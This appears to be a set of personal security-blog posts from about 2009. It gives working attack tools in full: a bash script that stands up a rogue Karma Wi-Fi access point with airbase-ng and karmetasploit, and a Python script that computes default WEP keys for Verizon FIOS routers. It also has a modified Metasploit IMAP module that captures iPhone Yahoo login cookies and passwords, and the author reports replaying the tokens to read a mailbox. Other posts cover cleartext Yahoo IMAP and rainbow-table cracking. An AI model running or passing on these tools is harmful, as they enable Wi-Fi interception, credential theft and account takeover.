I let the old domain www.mariod.net expire - was tired of GoDaddy adding bullshit charges for renewal. Meh..

So it has been close to a year since I posted anything. During that time I deployed to Africa, transferred to Japan and then went back on deployment. Got to spend some time in Australia, Vietnam, and a few other places I've never been. Good stuff.

A big reason for the lack of updates on here is that I finally got a Facebook account awhile back. I still plan to post tech items (scripts, research items, etc), but unfortunately I don't have much spare time anymore to really dig into the nitty-gritty of things. My new job is more of a mid-level advisor position vice day-to-day operations so I'm not as up-to-speed on the latest network security developments as I would like to be.

Anyways, for those of you who know me and haven't already done so find me on Facebook. If you don't know me I can still be reached at mario@mariod.net if needed.


#!/bin/bash
#
# karma.sh by mario
# 11 April 09
#
# Bash script to launch airbase-ng & (Kar)Metasploit. This is customized for
# my hardware and BT4 install. At a minimum you will need to add an appropiate
# subnet to your dhcpd3 conf file. This is what I'm using:
#
# subnet 192.168.2.0 netmask 255.255.255.0 {
# range 192.168.2.2 192.168.2.25;
# option broadcast-address 192.168.2.255;
# option domain-name-servers 192.168.2.1;
# option routers 192.168.2.1;
# }
#
# Alternatively you could replace the call to dhcpd3 with a properly
# configured dnsmasq setup...this opens the door to auto-scanning clients as they connect
# (if you use dnsmasq make sure you comment out the fakedns portions of karma.rc).
#
# You will also need a valid essids.txt file since airbase-ng is called with the -E flag.
#
# You may want to start-up tcpdump or Wireshark on at0 once this script finishes...the
# script runs tcpdump automatically for you.
#
# Log files are overwritten automatically everytime this script is ran. Files generated:
# karma.log
# airbase.log
# karma.pcap
#
# Airbase-ng, tcpdump, and dhcpd3 will continue to run after this script finishes.
# Uncomment the last two lines of the script if you wish these processes to terminate
# after you exit out of Metasploit.

if test "$1" == "" ; then
echo "Usage: $0 wireless_interface"
exit
fi

if iwconfig $1 essid "" key off ## Does iwconfig throw an error?
then
echo "Setting up monitor mode on $1"
else
echo "Usage: $0 essid wireless_interface"
exit
fi

mon=`airmon-ng start $1 | grep enabled | sed 's/)//' | awk '{print $5}'`
ifconfig $1 down
ifconfig $mon down

echo "Running macchanger"
macchanger -A $1
macchanger -A $mon
ifconfig $1 up
ifconfig $mon up

echo "Starting airbase-ng (logging to airbase.log)"
airbase-ng -P -C 30 -E ~/essids.txt $mon | tee airbase.log &
sleep 5 ## Give airbase some time to startup at0

echo "Configuring tunnel interface at0"
ifconfig at0 up 192.168.2.1 netmask 255.255.255.0

echo "Starting tcpdump on at0 (saving to karma.pcap)"
tcpdump -s 0 -i at0 -w karma.pcap &

echo "Initiating DHCP daemon"
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
ifconfig $mon mtu 1800 ## Supposedly fixes a bug in airbase

echo "Starting karmetasploit (logging to karma.log)"
msfconsole -r ~/karma.rc | tee karma.log

#pkill airbase
#pkill dhcpd3



Actually, I stole the hard part from the Wikipedia article for base36 encoding and the logic from a writeup about Verizon's weak-ass default WEP keying scheme for their FIOS wireless routers.

Code:

#!/usr/bin/python
#
# vsux.py by mario
# 27 March 2009
#
# This code is based off of research posted at
# http://xkyle.com/2009/03/03/verizon-fios-wireless-key-calculator/
# about Verizon's ActionTec MI424-WR Rev. D routers. A combination of
# the MAC addy and default ESSID is used to create the WEP key. This
# script provides the two possible default WEP keys for this router.
#
# ballz!

import string, sys

def base36decode(input):
CLIST="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
rv = pos = 0
charlist = list(input)
charlist.reverse()
for char in charlist:
rv += CLIST.find(char) * 36**pos
pos += 1
return rv

# If no arguments were given, print a helpful message
if len(sys.argv)!=2:
print 'Usage: ' + sys.argv[0] + ' ESSID'
sys.exit(0)

key1 = "1801" + "%x" % base36decode(sys.argv[1][::-1])
key2 = "1f90" + "%x" % base36decode(sys.argv[1][::-1])
print str.upper(key1)
print str.upper(key2)
sys.exit(0)


Here's a link to an updated imap.rb to place in your /pentest/exploits/framework3/modules/auxiliary/server/capture
directory (assuming you are using BT4 of course). If you run karmetasploit or the imap capture module as a standalone you should be able to snag iPhone Yahoo IMAP login tokens which you can replay for access to a victim's mailbox. I generally only need the first token, but sometimes both are needed.

I'm using netcat for now to get access, but their is a patch for KMail that allows you to use an email client to get at the data.

The bits I changed or added are in the on_client_data function (copied in its entirety below):


def on_client_data(c)
data = c.get_once
return if not data
num,cmd,arg = data.strip.split(/\s+/, 3)
arg ||= ""


if(cmd.upcase == "CAPABILITY")
c.put "* CAPABILITY IMAP4 IMAP4rev1 AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 AUTH=XYMPKI AUTH=XYMECOOKIE ID IDLE LOGIN-REFERRALS MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN\r\n"
c.put "#{num} OK CAPABILITY completed.\r\n"
end

if(cmd.upcase == "AUTHENTICATE" && arg.upcase == "XYMPKI")
c.put"+ \r\n"
cookie1 = c.get_once
c.put"+ \r\n"
cookie2 = c.get_once
print_status("iPhone Yahoo email cookies sniffed\r\n")
print_status("Cookie 1:\r\n#{cookie1}")
print_status("Cookie 2:\r\n#{cookie2}\r\n")
cookie1 = "empty"
cookie2 = "empty"
return
end

if(cmd.upcase == "LOGIN")
@state[c][:user], @state[c][:pass] = arg.split(/\s+/, 2)

report_auth_info(
:host => @state[c][:ip],
:proto => 'imap',
:targ_host => datastore['SRVHOST'],
:targ_port => datastore['SRVPORT'],
:user => @state[c][:user],
:pass => @state[c][:pass]
)
print_status("IMAP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
end

@state[c][:pass] = data.strip
c.put "#{num} NO LOGIN FAILURE\r\n"
return

end


Yep. Just tried it from two different servers (a simple netcat to port 143 on 76.13.13.50) and was able to authenticate with the same tokens captured via tcpdump from earlier in the day. I was able to browse everything in my mailboxes. I don't know how long the tokens are good for though....

Yeah, I caved and bought some iPhone goodness the other day at Best Buy. Contrary to what the friendly salesman told me I wan't able to tether it to my laptop. Little bit of research led me to the whole jailbreaking business and now I'm all up in the OS internals of my phone now.

So, yes, I can tether my laptop if I really need to, but I'm doing it the ghetto SSH way that involves setting up an ad-hoc network and all that jazz. It does work, but you have to spend 10 mins getting all the settings right (ever tried to set up an ad-hoc network in Vista? All I can is "goddamn...."). Lots of interesting things have been ported over to the iPhone - nmap, nc, tcpdump, etc and they all are now resident on my new shiny.

Tcpdump in particular has been revealing. I set up a service (5 hours of my life gone figuring out that particular OSX weirdness...damn plist) that starts tcpdump listening on the 3G interface figuring setting it up on the WiFi side would generate too much pcap. Got about a quarter of a meg over the day. Some of it was from a "phone home" service I installed to track my shiny if I lose it and the rest was from IMAP.

Yeah, IMAP...as in fucking plain text protocol IMAP.

Apparently the iPhone uses IMAP to check in (looks like hourly) with Yahoo to see if you have anything interesting waiting for consumption. Here's the authentication part of the IMAP session:

* OK IMAP4rev1 server ready (3.5.39)

1 CAPABILITY

* CAPABILITY IMAP4rev1 LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 AUTH=XYMPKI AUTH=XYMECOOKIE ID

1 OK CAPABILITY completed

2 AUTHENTICATE XYMPKI

+

WT12PTEmbj01O snipped a big chunk cuz I don't trust you leet h4x0r bastards out there uZQ==

2 OK AUTHENTICATE completed


Interesting....Yahoo mail cookies? Sure enough, when I broke out the nice long base64 encoded authentication string passed from my iPhone to the Yahoo IMAP server it turned out to be :

Y=v=1&n=584b4pv95&l=c0h8e3_ah/o&p=m2k013000000&jb=27|45|5&r=9r&lg=en-US&intl=us&np=1; T=z=t8XdJBtCtdJBPkT3CBF14KkMjUzBjY3MDZOMDZPMzQ-&a=YAE&sk=DAANatN9q3o/y3&ks=EAAc93828l5XVk.tLf5vUq0Ig--~C&d=c2wBTlRJMEFURXdOekU1TnpFNE5ETSNR0tOWVVVRDRLWQFvawFaVzAtAXp6AXQ4WGRKQmdXQQF0aXABSFpxT2ZE; version=2.2 revision=5G77 cid=c48681958ba7f3817e7b9f67a5e8f6e8b ts=1232446688 sig=c2vEYfZIYOyLkhc5SxE4KbU7GyoDFMsaWg1a63cvN5deYgUuxJItdlDmltOgxPz+Gq0/Mv7ld2qoIKiv1Hju952KT/EbYy55kW5b/ryBqwp2ogYI9Ow= src=iphone

(note that I paired out a bunch of characters in case someone figures out how to break Yahoo's authentication scheme....the field names are untouched though - just the values, to include number of characters were diddled)

...and of course every email I received via my Yahoo account that day was pushed to my iPhone in the clear. Nice.

What about Gmail?

Guess what - Gmail is using secure IMAP. Go figure...that is why they are going to rule the world.

As far as I can tell there is no way to force the iPhone or Yahoo to use secure IMAP. Not a biggy on their private 3G network, but your email is ripe for the picking if you are using an open WiFi access point(or one running WEP due to the comparative ease it can be broken now). And yes, when you have a WiFI connection the iPhone still uses plain IMAP with Yahoo...but through the WiFi IP addy. If you aren't running WPA with a reasonably (20+ characters) long and complex password then you should disable Yahoo email on your phone. Your login info appears to be reasonably secure (might be a possibility of a replay attack that would allow someone to log-in with your credentials, but I doubt it. When I have some spare time I'll try), but once again your actual email (the new ones and any you browse) are being passed in plain-text.

WTF Yahoo?

If you are using Gmail you should be fine. If your adversary has a means to break secure imap then you have bigger worries than the security of your email...

I'll try to update this at some point with pretty pictures and pcap...maybe this weekend....

Oh, I'm doing Shmoocon labs this year! w00t?

Passed the Linux+ exam yesterday. To prepare for it I bought and studied the Mike Meyers Linux+ Passport. The book was so-so; the biggest thing I got from it is that if you are a Debian/Ubuntu guy (like me) you had better start playing with Red Hat/Fedora Core before taking the exam. Fedora Core 9 is now running surprisingly well on my crappy-ass HP/Compaq $500 laptop.

Pretty logos for my certs...






I also have the Certified Reverse Engineering Analyst certification, but apparently no logos exist for that...

Yes, this could be HUGE: Google Chrome

Or it could be a prank. Me thinks not though....

If you are looking for the www.googlechromebeta.com page click here.

Ok,

So I just wasted several hours of my life trying to track down why Cain & Abel didn't like a set of NTLM rainbow tables I downloaded from mirror3.fpux.com . C&A kept throwing a "Verifying the file... (rainbow chain length verify fail, skipping) " error.

Turns out the file charset.txt in the Cain directory had an entry that didn't agree with the rainbow table description (loweralpha-numeric-all-space). After much mucking around and research (thanks Rajat!) I finally got it working by replacing the line

loweralpha-numeric-all-space= [abcdefghijklmnopqrstuvwxyzäöüß0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

with

loweralpha-numeric-all-space= [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

The only diff was the stupid German(?) letters ä ö ü and ß. Hopefully this post will save someone else out there a headache....

Also, here is a fairly comprehensive password cracking guide by bofh28 I found posted on the remote-exploit.org forums.